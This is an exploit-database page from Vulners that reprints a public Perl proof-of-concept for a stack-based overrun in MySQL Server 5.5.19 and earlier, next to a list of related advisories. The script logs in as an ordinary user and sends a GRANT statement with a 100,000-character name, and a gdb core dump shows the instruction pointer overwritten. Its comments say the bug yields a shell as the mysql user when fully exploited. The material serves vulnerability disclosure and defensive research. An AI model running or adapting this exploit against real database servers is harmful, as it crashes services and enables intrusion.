Vulners
Lucene search
Oracle MySQL Server 5.5.19-log Stack-Based Overrun
| Reporter | Title | Published | Views | Family All 270 |
|---|---|---|---|---|
 | Security fix for the ALT Linux 8 package mariadb version April | 1 Apr 201300:00 | – | altlinux |
 | Oracle MySQL Server 5.5.x < 5.5.29 Multiple Vulnerabilities | 25 Jan 201300:00 | – | nessus |
| Oracle MySQL Server 5.1.x < 5.1.67 Multiple Vulnerabilities | 19 Oct 201200:00 | – | nessus |
| MySQL Server 5.5.x < 5.5.29 Multiple Vulnerabilities | 25 Jan 201300:00 | – | nessus |
| MySQL Server 5.1.x < 5.1.67 Multiple Vulnerabilities | 19 Oct 201200:00 | – | nessus |
| MariaDB Server 5.5.x < 5.5.29 Multiple Buffer Overflows | 13 May 201600:00 | – | nessus |
| Amazon Linux AMI : mysql55 (ALAS-2012-144) | 4 Sep 201300:00 | – | nessus |
| Amazon Linux AMI : mysql51 (ALAS-2012-145) | 4 Sep 201300:00 | – | nessus |
| CentOS 6 : mysql (CESA-2012:1551) | 11 Dec 201200:00 | – | nessus |
| CentOS 5 : mysql (CESA-2013:0180) | 24 Jan 201300:00 | – | nessus |
10
`#!/usr/bin/perl
=for comment
MySQL Server exploitable stack based overrun
Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for suse-linux-gnu too)
unprivileged user (any account (anonymous account?), post auth)
as illustrated below the instruction pointer is overwritten with 0x41414141
bug found by Kingcope
this will yield a shell as the user 'mysql' when properly exploited
mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core
GNU gdb (GDB) SUSE (7.2-3.3)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i586-suse-linux".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Missing separate debuginfo for the main executable file
Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"
[New Thread 8801]
[New Thread 8789]
[New Thread 8793]
[New Thread 8791]
[New Thread 8787]
[New Thread 8790]
[New Thread 8799]
[New Thread 8794]
[New Thread 8792]
[New Thread 8788]
[New Thread 8800]
[New Thread 8786]
[New Thread 8797]
[New Thread 8798]
[New Thread 8785]
[New Thread 8796]
[New Thread 8783]
Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb)
=cut
use strict;
use DBI();
# Connect to the database.
my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",
"user", "secret",
{'RaiseError' => 1});
$a ="A" x 100000;
my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");
$sth->execute();
# Disconnect from the database.
$dbh->disconnect();
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Dec 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.66648